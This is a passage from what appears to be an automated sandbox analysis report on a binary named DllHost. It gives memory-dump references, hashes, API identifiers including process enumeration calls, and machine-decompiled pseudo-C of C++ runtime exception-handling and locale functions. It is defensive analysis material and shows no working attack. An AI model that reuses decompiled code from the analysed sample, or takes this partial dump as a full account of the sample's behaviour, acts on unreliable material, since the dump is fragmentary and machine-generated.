                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2081738530-0
                                                                                                                                                              • Opcode ID: 31fa5c03d32787f3e49275017725574edd6588cae595a63aeac21c71a1e0dde7
                                                                                                                                                              • Instruction ID: a9b35134a2f61dea1615819230710982a85e3313e0c98e8f6105504813b988b1
                                                                                                                                                              • Opcode Fuzzy Hash: 31fa5c03d32787f3e49275017725574edd6588cae595a63aeac21c71a1e0dde7
                                                                                                                                                              • Instruction Fuzzy Hash: 41316122A18E4281FE05BF55F8401B9E3B0EB55BB8F880132DA5D03695DE7CE49BD320
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B5330 Relevance: 9.1, APIs: 6, Instructions: 72processCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2284531361-0
                                                                                                                                                              • Opcode ID: 39d09240c3e57bf505224a1dad52521adbc0ca33928afe64590b9b86d9a9dbbe
                                                                                                                                                              • Instruction ID: ea207bda4830de756f15ab2c3475c76be0834a490b26e0bd831a4b8c05a7effa
                                                                                                                                                              • Opcode Fuzzy Hash: 39d09240c3e57bf505224a1dad52521adbc0ca33928afe64590b9b86d9a9dbbe
                                                                                                                                                              • Instruction Fuzzy Hash: 3631543160CE8685FA65AF11F4442A9A3B2FB49BA8FC44131CA4D46754EF3DE58ED710
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D5E84 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                              			E00007FF77FF7191D5E84(void* __ecx, intOrPtr* __rcx, long long __rdx, void* __r8, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t157;
				intOrPtr _t158;
				intOrPtr _t160;
				void* _t179;
				intOrPtr _t195;
				intOrPtr _t200;
				void* _t201;
				signed long long _t239;
				signed long long _t240;
				signed char _t241;
				intOrPtr* _t243;
				long long _t245;
				long long _t253;
				intOrPtr* _t255;
				signed char* _t257;
				intOrPtr* _t269;
				void* _t290;
				void* _t291;
				void* _t292;
				void* _t293;
				signed long long _t294;
				long long _t303;
				long long _t304;
				intOrPtr* _t305;
				long long _t313;
				signed char* _t316;
				intOrPtr _t321;

				_t292 = _t293 - 0x88;
				_t294 = _t293 - 0x188;
				_t239 =  *0x192190a0; // 0x590452ce5669
				_t240 = _t239 ^ _t294;
				 *(_t292 + 0x70) = _t240;
				_t316 =  *((intOrPtr*)(_t292 + 0xf0));
				 *((long long*)(_t294 + 0x78)) = __rdx;
				_t257 = _t316;
				 *((long long*)(_t292 - 0x60)) =  *((intOrPtr*)(_t292 + 0x108));
				_t291 = __r9;
				 *((char*)(_t294 + 0x60)) = 0;
				E00007FF77FF7191D5134(_t257, __r9, __r9);
				if ( *((intOrPtr*)(__r9 + 0x48)) == 0) goto 0x191d5f00;
				E00007FF77FF7191D4EF8(_t240);
				if ( *((intOrPtr*)(_t240 + 0x78)) != 0xfffffffe) goto 0x191d6379;
				goto 0x191d5f1f;
				E00007FF77FF7191D4EF8(_t240);
				if ( *((intOrPtr*)(_t240 + 0x78)) == 0xfffffffe) goto 0x191d5f1f;
				E00007FF77FF7191D4EF8(_t240);
				_t200 =  *((intOrPtr*)(_t240 + 0x78));
				E00007FF77FF7191D4EF8(_t240);
				 *((intOrPtr*)(_t240 + 0x78)) = 0xfffffffe;
				if (_t200 - 0xffffffff < 0) goto 0x191d6379;
				if (_t316[8] == 0) goto 0x191d5f5f;
				_t241 = _t257[0x7ff719202b50];
				goto 0x191d5f61;
				if (_t200 >= 0) goto 0x191d6379;
				if ( *__rcx != 0xe06d7363) goto 0x191d6039;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 4) goto 0x191d6039;
				if ( *((intOrPtr*)(__rcx + 0x20)) - 0x19930520 - 2 > 0) goto 0x191d6039;
				if ( *((long long*)(__rcx + 0x30)) != 0) goto 0x191d6039;
				E00007FF77FF7191D4EF8(_t241);
				if ( *((long long*)(_t241 + 0x20)) == 0) goto 0x191d6317;
				E00007FF77FF7191D4EF8(_t241);
				_t255 =  *((intOrPtr*)(_t241 + 0x20));
				E00007FF77FF7191D4EF8(_t241);
				 *((char*)(_t294 + 0x60)) = 1;
				E00007FF77FF7191D3E28(_t241,  *((intOrPtr*)(_t255 + 0x38)));
				if ( *_t255 != 0xe06d7363) goto 0x191d5ff1;
				if ( *((intOrPtr*)(_t255 + 0x18)) != 4) goto 0x191d5ff1;
				if ( *((intOrPtr*)(_t255 + 0x20)) - 0x19930520 - 2 > 0) goto 0x191d5ff1;
				if ( *((long long*)(_t255 + 0x30)) == 0) goto 0x191d6379;
				E00007FF77FF7191D4EF8(_t241);
				if ( *(_t241 + 0x38) == 0) goto 0x191d6039;
				E00007FF77FF7191D4EF8(_t241);
				E00007FF77FF7191D4EF8(_t241);
				 *(_t241 + 0x38) =  *(_t241 + 0x38) & 0x00000000;
				if (E00007FF77FF7191D7D10(_t241, _t255, _t255,  *(_t241 + 0x38), __r9) != 0) goto 0x191d6034;
				if (E00007FF77FF7191D7E00(_t241, _t255,  *(_t241 + 0x38), __r9, _t292) == 0) goto 0x191d635b;
				goto 0x191d6337;
				E00007FF77FF7191D7054(_t292 - 0x10, _t316,  *((intOrPtr*)(__r9 + 8)));
				if ( *_t255 != 0xe06d7363) goto 0x191d62cf;
				if ( *((intOrPtr*)(_t255 + 0x18)) != 4) goto 0x191d62cf;
				if ( *((intOrPtr*)(_t255 + 0x20)) - 0x19930520 - 2 > 0) goto 0x191d62cf;
				if ( *((intOrPtr*)(_t292 - 0x10)) <= 0) goto 0x191d62b4;
				 *((intOrPtr*)(_t294 + 0x28)) =  *((intOrPtr*)(_t292 + 0x100));
				 *(_t294 + 0x20) = _t316;
				r8d = _t200;
				_t157 = E00007FF77FF7191D380C(_t255, _t292 - 0x58, _t292 - 0x10, _t290, _t291, _t292);
				asm("movups xmm0, [ebp-0x58]");
				asm("movdqu [ebp-0x78], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t157 -  *((intOrPtr*)(_t292 - 0x40)) >= 0) goto 0x191d62b4;
				_t158 =  *((intOrPtr*)(_t292 - 0x70));
				 *((long long*)(_t292 - 0x80)) =  *((intOrPtr*)(_t292 - 0x58));
				 *((intOrPtr*)(_t294 + 0x68)) = _t158;
				asm("inc ecx");
				asm("dec ax");
				asm("movups [ebp-0x78], xmm0");
				if (_t158 - _t200 > 0) goto 0x191d620f;
				if (_t200 - _t158 > 0) goto 0x191d620f;
				_t243 =  *((intOrPtr*)(_t291 + 0x10));
				r9d =  *_t243;
				E00007FF77FF7191D6FD8(_t243, _t292 + 0x20, _t292 - 0x78,  *((intOrPtr*)(_t291 + 8)));
				_t160 =  *((intOrPtr*)(_t292 + 0x20));
				r12d = 0;
				 *((intOrPtr*)(_t294 + 0x64)) = r12d;
				 *((intOrPtr*)(_t294 + 0x6c)) = _t160;
				if (_t160 == 0) goto 0x191d620f;
				asm("movups xmm0, [ebp+0x38]");
				asm("movups xmm1, [ebp+0x48]");
				asm("movups [ebp-0x38], xmm0");
				asm("movsd xmm0, [ebp+0x58]");
				asm("movsd [ebp-0x18], xmm0");
				asm("movups [ebp-0x28], xmm1");
				E00007FF77FF7191D3DFC(_t243);
				_t245 = _t243 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x30)) + 0xc));
				 *((long long*)(_t294 + 0x70)) = _t245;
				E00007FF77FF7191D3DFC(_t245);
				r15d =  *((intOrPtr*)(_t245 +  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x30)) + 0xc))));
				if (r15d <= 0) goto 0x191d619a;
				E00007FF77FF7191D3DFC(_t245);
				_t313 = _t245 +  *((intOrPtr*)( *((intOrPtr*)(_t294 + 0x70))));
				if (E00007FF77FF7191D69C8(_t201, _t255, _t292 - 0x38, _t313, _t290, _t291,  *((intOrPtr*)(_t255 + 0x30))) != 0) goto 0x191d61b7;
				 *((long long*)(_t294 + 0x70)) =  *((long long*)(_t294 + 0x70)) + 4;
				r15d = r15d - 1;
				if (r15d > 0) goto 0x191d6160;
				r12d =  *((intOrPtr*)(_t294 + 0x64));
				E00007FF77FF7191D75C4( *((intOrPtr*)(_t294 + 0x70)), _t292 + 0x20);
				r12d = r12d + 1;
				 *((intOrPtr*)(_t294 + 0x64)) = r12d;
				if (r12d ==  *((intOrPtr*)(_t294 + 0x6c))) goto 0x191d620b;
				goto 0x191d6117;
				 *((char*)(_t294 + 0x58)) =  *((intOrPtr*)(_t292 + 0xf8));
				_t269 = _t255;
				 *((char*)(_t294 + 0x50)) =  *((intOrPtr*)(_t294 + 0x60));
				 *((long long*)(_t294 + 0x48)) =  *((intOrPtr*)(_t292 - 0x60));
				 *((intOrPtr*)(_t294 + 0x40)) =  *((intOrPtr*)(_t292 + 0x100));
				 *((long long*)(_t294 + 0x38)) = _t292 - 0x78;
				 *((long long*)(_t294 + 0x30)) = _t313;
				 *((long long*)(_t294 + 0x28)) = _t292 - 0x38;
				 *(_t294 + 0x20) = _t316;
				E00007FF77FF7191D58E8(_t257[0x7ff719202b60], _t255, _t269,  *((intOrPtr*)(_t294 + 0x78)),  *((intOrPtr*)(_t241 + 0x28)), _t291);
				_t321 =  *((intOrPtr*)(_t292 - 0x80));
				_t303 =  *((intOrPtr*)(_t321 + 8)) -  *((char*)(_t269 + 0x7ff719202b50));
				 *((long long*)(_t321 + 8)) = _t303;
				 *(_t321 + 0x18) =  *(_t303 - 4) >>  *(_t269 + 0x7ff719202b60);
				_t304 = _t303 -  *((char*)(_t269 + 0x7ff719202b50));
				 *((long long*)(_t321 + 8)) = _t304;
				 *(_t321 + 0x1c) =  *(_t304 - 4) >>  *(_t269 + 0x7ff719202b60);
				_t305 = _t304 -  *((char*)(_t269 + 0x7ff719202b50));
				 *(_t321 + 0x20) =  *(_t305 - 4) >>  *(_t269 + 0x7ff719202b60);
				_t195 =  *((intOrPtr*)(_t294 + 0x68)) + 1;
				 *((long long*)(_t321 + 8)) = _t305;
				_t116 = _t305 + 4; // 0x4
				_t253 = _t116;
				 *((long long*)(_t321 + 8)) = _t253;
				 *((intOrPtr*)(_t321 + 0x24)) =  *_t305;
				 *((intOrPtr*)(_t294 + 0x68)) = _t195;
				if (_t195 -  *((intOrPtr*)(_t292 - 0x40)) < 0) goto 0x191d60c6;
				if (( *_t316 & 0x00000040) == 0) goto 0x191d630b;
				if (E00007FF77FF7191D353C(_t316) == 0) goto 0x191d6361;
				goto 0x191d630b;
				if ( *((intOrPtr*)(_t292 - 0x10)) <= 0) goto 0x191d630b;
				if ( *((char*)(_t292 + 0xf8)) != 0) goto 0x191d6379;
				 *((long long*)(_t294 + 0x38)) = _t313;
				 *((intOrPtr*)(_t294 + 0x30)) =  *((intOrPtr*)(_t292 + 0x100));
				 *((intOrPtr*)(_t294 + 0x28)) = _t200;
				 *(_t294 + 0x20) = _t316;
				E00007FF77FF7191D6598( *_t305, _t255, _t321,  *((intOrPtr*)(_t241 + 0x28)), _t291);
				_t179 = E00007FF77FF7191D4EF8(_t253);
				if ( *((long long*)(_t253 + 0x38)) != 0) goto 0x191d6379;
				return E00007FF77FF7191D23B0(_t179, _t195,  *(_t292 + 0x70) ^ _t294);
			}


































                                                                                                                                                              0x7ff7191d5e91
                                                                                                                                                              0x7ff7191d5e99
                                                                                                                                                              0x7ff7191d5ea0
                                                                                                                                                              0x7ff7191d5ea7
                                                                                                                                                              0x7ff7191d5eaa
                                                                                                                                                              0x7ff7191d5eae
                                                                                                                                                              0x7ff7191d5ec2
                                                                                                                                                              0x7ff7191d5ec7
                                                                                                                                                              0x7ff7191d5ecd
                                                                                                                                                              0x7ff7191d5ed1
                                                                                                                                                              0x7ff7191d5ed4
                                                                                                                                                              0x7ff7191d5edc
                                                                                                                                                              0x7ff7191d5ee7
                                                                                                                                                              0x7ff7191d5ee9
                                                                                                                                                              0x7ff7191d5ef2
                                                                                                                                                              0x7ff7191d5efe
                                                                                                                                                              0x7ff7191d5f00
                                                                                                                                                              0x7ff7191d5f09
                                                                                                                                                              0x7ff7191d5f0b
                                                                                                                                                              0x7ff7191d5f10
                                                                                                                                                              0x7ff7191d5f13
                                                                                                                                                              0x7ff7191d5f18
                                                                                                                                                              0x7ff7191d5f22
                                                                                                                                                              0x7ff7191d5f34
                                                                                                                                                              0x7ff7191d5f44
                                                                                                                                                              0x7ff7191d5f5d
                                                                                                                                                              0x7ff7191d5f63
                                                                                                                                                              0x7ff7191d5f6f
                                                                                                                                                              0x7ff7191d5f79
                                                                                                                                                              0x7ff7191d5f8a
                                                                                                                                                              0x7ff7191d5f95
                                                                                                                                                              0x7ff7191d5f9b
                                                                                                                                                              0x7ff7191d5fa5
                                                                                                                                                              0x7ff7191d5fab
                                                                                                                                                              0x7ff7191d5fb0
                                                                                                                                                              0x7ff7191d5fb4
                                                                                                                                                              0x7ff7191d5fbd
                                                                                                                                                              0x7ff7191d5fc6
                                                                                                                                                              0x7ff7191d5fd1
                                                                                                                                                              0x7ff7191d5fd7
                                                                                                                                                              0x7ff7191d5fe4
                                                                                                                                                              0x7ff7191d5feb
                                                                                                                                                              0x7ff7191d5ff1
                                                                                                                                                              0x7ff7191d5ffb
                                                                                                                                                              0x7ff7191d5ffd
                                                                                                                                                              0x7ff7191d6006
                                                                                                                                                              0x7ff7191d6011
                                                                                                                                                              0x7ff7191d601d
                                                                                                                                                              0x7ff7191d6029
                                                                                                                                                              0x7ff7191d602f
                                                                                                                                                              0x7ff7191d6044
                                                                                                                                                              0x7ff7191d604f
                                                                                                                                                              0x7ff7191d6059
                                                                                                                                                              0x7ff7191d606a
                                                                                                                                                              0x7ff7191d6074
                                                                                                                                                              0x7ff7191d6084
                                                                                                                                                              0x7ff7191d608f
                                                                                                                                                              0x7ff7191d6094
                                                                                                                                                              0x7ff7191d6097
                                                                                                                                                              0x7ff7191d609c
                                                                                                                                                              0x7ff7191d60a0
                                                                                                                                                              0x7ff7191d60a5
                                                                                                                                                              0x7ff7191d60aa
                                                                                                                                                              0x7ff7191d60b1
                                                                                                                                                              0x7ff7191d60bb
                                                                                                                                                              0x7ff7191d60be
                                                                                                                                                              0x7ff7191d60c2
                                                                                                                                                              0x7ff7191d60c6
                                                                                                                                                              0x7ff7191d60cb
                                                                                                                                                              0x7ff7191d60d0
                                                                                                                                                              0x7ff7191d60d6
                                                                                                                                                              0x7ff7191d60e2
                                                                                                                                                              0x7ff7191d60e8
                                                                                                                                                              0x7ff7191d60f8
                                                                                                                                                              0x7ff7191d60fb
                                                                                                                                                              0x7ff7191d6100
                                                                                                                                                              0x7ff7191d6103
                                                                                                                                                              0x7ff7191d6106
                                                                                                                                                              0x7ff7191d610b
                                                                                                                                                              0x7ff7191d6111
                                                                                                                                                              0x7ff7191d6117
                                                                                                                                                              0x7ff7191d611b
                                                                                                                                                              0x7ff7191d611f
                                                                                                                                                              0x7ff7191d6123
                                                                                                                                                              0x7ff7191d6128
                                                                                                                                                              0x7ff7191d612d
                                                                                                                                                              0x7ff7191d6131
                                                                                                                                                              0x7ff7191d6142
                                                                                                                                                              0x7ff7191d6145
                                                                                                                                                              0x7ff7191d614a
                                                                                                                                                              0x7ff7191d6157
                                                                                                                                                              0x7ff7191d615e
                                                                                                                                                              0x7ff7191d6160
                                                                                                                                                              0x7ff7191d6174
                                                                                                                                                              0x7ff7191d6185
                                                                                                                                                              0x7ff7191d6187
                                                                                                                                                              0x7ff7191d618d
                                                                                                                                                              0x7ff7191d6193
                                                                                                                                                              0x7ff7191d6195
                                                                                                                                                              0x7ff7191d619e
                                                                                                                                                              0x7ff7191d61a3
                                                                                                                                                              0x7ff7191d61a6
                                                                                                                                                              0x7ff7191d61b0
                                                                                                                                                              0x7ff7191d61b2
                                                                                                                                                              0x7ff7191d61c8
                                                                                                                                                              0x7ff7191d61cc
                                                                                                                                                              0x7ff7191d61d3
                                                                                                                                                              0x7ff7191d61db
                                                                                                                                                              0x7ff7191d61e6
                                                                                                                                                              0x7ff7191d61ee
                                                                                                                                                              0x7ff7191d61f7
                                                                                                                                                              0x7ff7191d61fc
                                                                                                                                                              0x7ff7191d6201
                                                                                                                                                              0x7ff7191d6206
                                                                                                                                                              0x7ff7191d620b
                                                                                                                                                              0x7ff7191d6231
                                                                                                                                                              0x7ff7191d623a
                                                                                                                                                              0x7ff7191d623e
                                                                                                                                                              0x7ff7191d6259
                                                                                                                                                              0x7ff7191d6262
                                                                                                                                                              0x7ff7191d6266
                                                                                                                                                              0x7ff7191d6281
                                                                                                                                                              0x7ff7191d628e
                                                                                                                                                              0x7ff7191d6292
                                                                                                                                                              0x7ff7191d6294
                                                                                                                                                              0x7ff7191d6298
                                                                                                                                                              0x7ff7191d6298
                                                                                                                                                              0x7ff7191d629f
                                                                                                                                                              0x7ff7191d62a3
                                                                                                                                                              0x7ff7191d62a7
                                                                                                                                                              0x7ff7191d62ae
                                                                                                                                                              0x7ff7191d62b8
                                                                                                                                                              0x7ff7191d62c7
                                                                                                                                                              0x7ff7191d62cd
                                                                                                                                                              0x7ff7191d62d3
                                                                                                                                                              0x7ff7191d62dc
                                                                                                                                                              0x7ff7191d62eb
                                                                                                                                                              0x7ff7191d62f3
                                                                                                                                                              0x7ff7191d62fa
                                                                                                                                                              0x7ff7191d6301
                                                                                                                                                              0x7ff7191d6306
                                                                                                                                                              0x7ff7191d630b
                                                                                                                                                              0x7ff7191d6315
                                                                                                                                                              0x7ff7191d6336

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                              • API String ID: 3523768491-393685449
                                                                                                                                                              • Opcode ID: 7d8ed3c9773a7e26a1c7d08bfbb92b9ebba21acb3f727a1fe19140e89bc57067
                                                                                                                                                              • Instruction ID: d8db11e07591097e6654505bd0a220e21f6cb73ceaf45300be5f3b2e38fd64f3
                                                                                                                                                              • Opcode Fuzzy Hash: 7d8ed3c9773a7e26a1c7d08bfbb92b9ebba21acb3f727a1fe19140e89bc57067
                                                                                                                                                              • Instruction Fuzzy Hash: D0E1A273A08A818AF710AF24E4882ADB7F0FB457ACF950535DA8D47695DF38E4CAD710
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B2110 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 67%
                                                                                                                                                              			E00007FF77FF7191B2110(long long __rax, long long __rbx, long long* __rcx, void* __rdx, long long __rsi) {
				void* _t51;
				intOrPtr _t76;
				void* _t90;
				long long* _t91;
				long long _t94;
				void* _t96;
				void* _t97;
				void* _t99;
				void* _t102;
				long long _t104;

				_t67 = __rax;
				 *((long long*)(_t99 + 0x10)) = __rbx;
				 *((long long*)(_t99 + 0x18)) = __rsi;
				_t97 = _t99 - 0x47;
				_t91 = __rcx;
				if (__rcx == 0) goto 0x191b2272;
				if ( *__rcx != 0) goto 0x191b2272;
				E00007FF77FF7191D23D8(__rax, __rcx);
				_t94 = __rax;
				 *((long long*)(_t97 + 0x67)) = __rax;
				_t76 =  *((intOrPtr*)(__rdx + 8));
				if (_t76 == 0) goto 0x191b216c;
				if ( *((intOrPtr*)(_t76 + 0x28)) != 0) goto 0x191b2173;
				goto 0x191b2173;
				E00007FF77FF7191D0D0C(0, _t97 - 0x49);
				r14d = 0;
				 *((long long*)(_t97 - 0x41)) = _t104;
				 *((intOrPtr*)(_t97 - 0x39)) = r14b;
				 *((long long*)(_t97 - 0x31)) = _t104;
				 *((intOrPtr*)(_t97 - 0x29)) = r14b;
				 *((long long*)(_t97 - 0x21)) = _t104;
				 *((intOrPtr*)(_t97 - 0x19)) = r14w;
				 *((long long*)(_t97 - 0x11)) = _t104;
				 *((intOrPtr*)(_t97 - 9)) = r14w;
				 *((long long*)(_t97 - 1)) = _t104;
				 *((intOrPtr*)(_t97 + 7)) = r14b;
				 *((long long*)(_t97 + 0xf)) = _t104;
				 *((intOrPtr*)(_t97 + 0x17)) = r14b;
				if (0x1920f71b == 0) goto 0x191b228f;
				E00007FF77FF7191D12B8(_t67, 0x1920f71b, _t97 - 0x49, 0x1920f71b);
				 *((intOrPtr*)(_t94 + 8)) = r14d;
				 *_t94 = 0x191f9700;
				E00007FF77FF7191D17C4(0x191f9700, _t97 + 0x1f, 0x1920f71b, _t102);
				asm("movups xmm0, [eax]");
				asm("movups [esi+0x10], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [esi+0x20], xmm1");
				 *_t91 = _t94;
				E00007FF77FF7191D1324(_t97 - 0x49);
				if ( *((intOrPtr*)(_t97 + 0xf)) == 0) goto 0x191b220a;
				E00007FF77FF7191D9C88(0x30, 0, 0x1920f71b, 0x1920f71b, _t104);
				 *((long long*)(_t97 + 0xf)) = _t104;
				if ( *((intOrPtr*)(_t97 - 1)) == 0) goto 0x191b221c;
				E00007FF77FF7191D9C88(0x30, 0, 0x1920f71b, 0x1920f71b, _t90);
				 *((long long*)(_t97 - 1)) = _t104;
				if ( *((intOrPtr*)(_t97 - 0x11)) == 0) goto 0x191b222e;
				E00007FF77FF7191D9C88(0x30, 0, 0x1920f71b, 0x1920f71b, _t96);
				 *((long long*)(_t97 - 0x11)) = _t104;
				if ( *((intOrPtr*)(_t97 - 0x21)) == 0) goto 0x191b2240;
				E00007FF77FF7191D9C88(0x30, 0, 0x1920f71b, 0x1920f71b);
				 *((long long*)(_t97 - 0x21)) = _t104;
				if ( *((intOrPtr*)(_t97 - 0x31)) == 0) goto 0x191b2252;
				E00007FF77FF7191D9C88(0x30, 0, 0x1920f71b, 0x1920f71b);
				 *((long long*)(_t97 - 0x31)) = _t104;
				if ( *((intOrPtr*)(_t97 - 0x41)) == 0) goto 0x191b2264;
				_t51 = E00007FF77FF7191D9C88(0x30, 0, 0x1920f71b, 0x1920f71b);
				 *((long long*)(_t97 - 0x41)) = _t104;
				E00007FF77FF7191D0D84(_t51, _t97 - 0x49);
				return 2;
			}













                                                                                                                                                              0x7ff7191b2110
                                                                                                                                                              0x7ff7191b2110
                                                                                                                                                              0x7ff7191b2115
                                                                                                                                                              0x7ff7191b211e
                                                                                                                                                              0x7ff7191b212d
                                                                                                                                                              0x7ff7191b2133
                                                                                                                                                              0x7ff7191b213d
                                                                                                                                                              0x7ff7191b2148
                                                                                                                                                              0x7ff7191b214d
                                                                                                                                                              0x7ff7191b2150
                                                                                                                                                              0x7ff7191b2154
                                                                                                                                                              0x7ff7191b215b
                                                                                                                                                              0x7ff7191b2164
                                                                                                                                                              0x7ff7191b216a
                                                                                                                                                              0x7ff7191b2179
                                                                                                                                                              0x7ff7191b217f
                                                                                                                                                              0x7ff7191b2182
                                                                                                                                                              0x7ff7191b2186
                                                                                                                                                              0x7ff7191b218a
                                                                                                                                                              0x7ff7191b218e
                                                                                                                                                              0x7ff7191b2192
                                                                                                                                                              0x7ff7191b2196
                                                                                                                                                              0x7ff7191b219b
                                                                                                                                                              0x7ff7191b219f
                                                                                                                                                              0x7ff7191b21a4
                                                                                                                                                              0x7ff7191b21a8
                                                                                                                                                              0x7ff7191b21ac
                                                                                                                                                              0x7ff7191b21b0
                                                                                                                                                              0x7ff7191b21b7
                                                                                                                                                              0x7ff7191b21c4
                                                                                                                                                              0x7ff7191b21ca
                                                                                                                                                              0x7ff7191b21d5
                                                                                                                                                              0x7ff7191b21dc
                                                                                                                                                              0x7ff7191b21e1
                                                                                                                                                              0x7ff7191b21e4
                                                                                                                                                              0x7ff7191b21e8
                                                                                                                                                              0x7ff7191b21ec
                                                                                                                                                              0x7ff7191b21f0
                                                                                                                                                              0x7ff7191b21f7
                                                                                                                                                              0x7ff7191b2203
                                                                                                                                                              0x7ff7191b2205
                                                                                                                                                              0x7ff7191b220a
                                                                                                                                                              0x7ff7191b2215
                                                                                                                                                              0x7ff7191b2217
                                                                                                                                                              0x7ff7191b221c
                                                                                                                                                              0x7ff7191b2227
                                                                                                                                                              0x7ff7191b2229
                                                                                                                                                              0x7ff7191b222e
                                                                                                                                                              0x7ff7191b2239
                                                                                                                                                              0x7ff7191b223b
                                                                                                                                                              0x7ff7191b2240
                                                                                                                                                              0x7ff7191b224b
                                                                                                                                                              0x7ff7191b224d
                                                                                                                                                              0x7ff7191b2252
                                                                                                                                                              0x7ff7191b225d
                                                                                                                                                              0x7ff7191b225f
                                                                                                                                                              0x7ff7191b2264
                                                                                                                                                              0x7ff7191b226c
                                                                                                                                                              0x7ff7191b228e

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                              • API String ID: 2967684691-1405518554
                                                                                                                                                              • Opcode ID: 809c3c3d50246916bd668b74c130f17b0c8ce0bb6b3f132789c64f4ee8d09b64
                                                                                                                                                              • Instruction ID: 7663d4a614e0438524f9777ee79f116db6b1c07752134b7c7254cd284049caf0
                                                                                                                                                              • Opcode Fuzzy Hash: 809c3c3d50246916bd668b74c130f17b0c8ce0bb6b3f132789c64f4ee8d09b64
                                                                                                                                                              • Instruction Fuzzy Hash: 1F417D22B0AF4189FB14EF60E4502FC63B5AF54758F844534DE4E66A59CE38D69BE320
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191F8AD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
